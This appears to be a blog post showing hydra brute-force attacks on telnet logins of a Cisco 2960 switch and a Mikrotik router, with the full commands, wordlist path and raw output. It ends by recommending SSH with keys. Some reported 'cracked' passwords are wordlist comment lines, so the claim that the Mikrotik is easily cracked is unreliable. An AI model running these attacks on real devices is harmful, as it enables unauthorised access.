Cracking the Cisco telnet password on a Cisco 2960 switch is very easy when you are using the hydra password cracking tool. I used this command to crack the telnet login.
hydra -P password.lst 10.42.0.87 cisco
This is the password cracking session that resulted in me cracking the telnet login.
root@darknet:~# hydra -P password.lst 10.42.0.87 cisco Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:28:39 [WARNING] you should set the number of parallel task to 4 for cisco services. [DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task [DATA] attacking service cisco on port 23 [23][cisco] host: 10.42.0.87 password: password |
Here is another example, this is a telnet password set on a Mikrotik Cloud Switch Router.
root@darknet:~# hydra -l cisco -P password.lst 172.18.31.162 telnet Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:42:06 [WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available [DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task [DATA] attacking service telnet on port 23 [ERROR] Not a TELNET protocol or service shutdown [ERROR] Not a TELNET protocol or service shutdown [ERROR] Not a TELNET protocol or service shutdown [ERROR] Not a TELNET protocol or service shutdown [ERROR] Not a TELNET protocol or service shutdown [ERROR] Not a TELNET protocol or service shutdown [ERROR] Not a TELNET protocol or service shutdown [ERROR] Not a TELNET protocol or service shutdown [ERROR] Not a TELNET protocol or service shutdown [ERROR] Not a TELNET protocol or service shutdown [ERROR] Not a TELNET protocol or service shutdown [23][telnet] host: 172.18.31.162 login: cisco password: #!comment: [23][telnet] host: 172.18.31.162 login: cisco password: #!comment: This list is based on passwords most commonly seen on a set of Unix [23][telnet] host: 172.18.31.162 login: cisco password: #!comment: systems in mid-1990's, sorted for decreasing number of occurrences [23][telnet] host: 172.18.31.162 login: cisco password: #!comment: (that is, more common passwords are listed first). It has been [23][telnet] host: 172.18.31.162 login: cisco password: #!comment: revised to also include common website passwords from public lists [ERROR] Child with pid 8260 terminating, can not connect [ERROR] Child with pid 8262 terminating, can not connect [ERROR] Child with pid 8263 terminating, can not connect [ERROR] Child with pid 8264 terminating, can not connect [ERROR] Child with pid 8268 terminating, can not connect [ERROR] Child with pid 8266 terminating, can not connect [ERROR] Child with pid 8267 terminating, can not connect [ERROR] Child with pid 8269 terminating, can not connect [23][telnet] host: 172.18.31.162 login: cisco password: password1 [23][telnet] host: 172.18.31.162 login: cisco password: #!comment: in 1996 through 2011. It is assumed to be in the public domain. [23][telnet] host: 172.18.31.162 login: cisco password: #!comment: This list has been compiled by Solar Designer of Openwall Project ^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session. |
This is also easily cracked.
I am using the wordlist from /usr/share/john/password.lst, but there are wordlists in /usr/share/wordlists.
Here is another example,
root@darknet:~# hydra -l cisco -P password.lst 172.18.31.162 telnet Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:49:13 [WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available [DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task [DATA] attacking service telnet on port 23 [ERROR] Child with pid 14712 terminating, can not connect [ERROR] Child with pid 14715 terminating, can not connect [ERROR] Child with pid 14714 terminating, can not connect [ERROR] Child with pid 14713 terminating, can not connect [ERROR] Child with pid 14719 terminating, can not connect [ERROR] Child with pid 14717 terminating, can not connect [ERROR] Child with pid 14716 terminating, can not connect [ERROR] Child with pid 14720 terminating, can not connect [ERROR] Child with pid 14718 terminating, can not connect [ERROR] Child with pid 14721 terminating, can not connect [ERROR] Child with pid 15070 terminating, can not connect [23][telnet] host: 172.18.31.162 login: cisco password: spring [23][telnet] host: 172.18.31.162 login: cisco password: steven [ERROR] Child with pid 15071 terminating, can not connect [ERROR] Child with pid 15074 terminating, can not connect [ERROR] Child with pid 15073 terminating, can not connect [ERROR] Child with pid 15076 terminating, can not connect [ERROR] Child with pid 15078 terminating, can not connect [ERROR] Child with pid 15079 terminating, can not connect [ERROR] Child with pid 15080 terminating, can not connect [ERROR] Child with pid 15081 terminating, can not connect [ERROR] Child with pid 15083 terminating, can not connect [ERROR] Child with pid 15084 terminating, can not connect [ERROR] Child with pid 15085 terminating, can not connect [ERROR] Child with pid 15087 terminating, can not connect [ERROR] Child with pid 15088 terminating, can not connect [STATUS] 3559.00 tries/min, 3559 tries in 00:01h, 1 todo in 00:01h, 16 active [23][telnet] host: 172.18.31.162 login: cisco password: beavis [STATUS] 1779.50 tries/min, 3559 tries in 00:02h, 1 todo in 00:01h, 16 active [STATUS] 1186.33 tries/min, 3559 tries in 00:03h, 1 todo in 00:01h, 16 active [STATUS] 889.75 tries/min, 3559 tries in 00:04h, 1 todo in 00:01h, 16 active [STATUS] 711.80 tries/min, 3559 tries in 00:05h, 1 todo in 00:01h, 16 active [STATUS] 593.17 tries/min, 3559 tries in 00:06h, 1 todo in 00:01h, 16 active [STATUS] 508.43 tries/min, 3559 tries in 00:07h, 1 todo in 00:01h, 16 active [STATUS] 444.88 tries/min, 3559 tries in 00:08h, 1 todo in 00:01h, 16 active ^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session. |
This goes to show the telnet protocol is very insecure at the best of times especially when you are using a weak password. That is why it is better to use SSH on a Cisco switch or router and SSH keys instead of passwords.
Why does that error shows?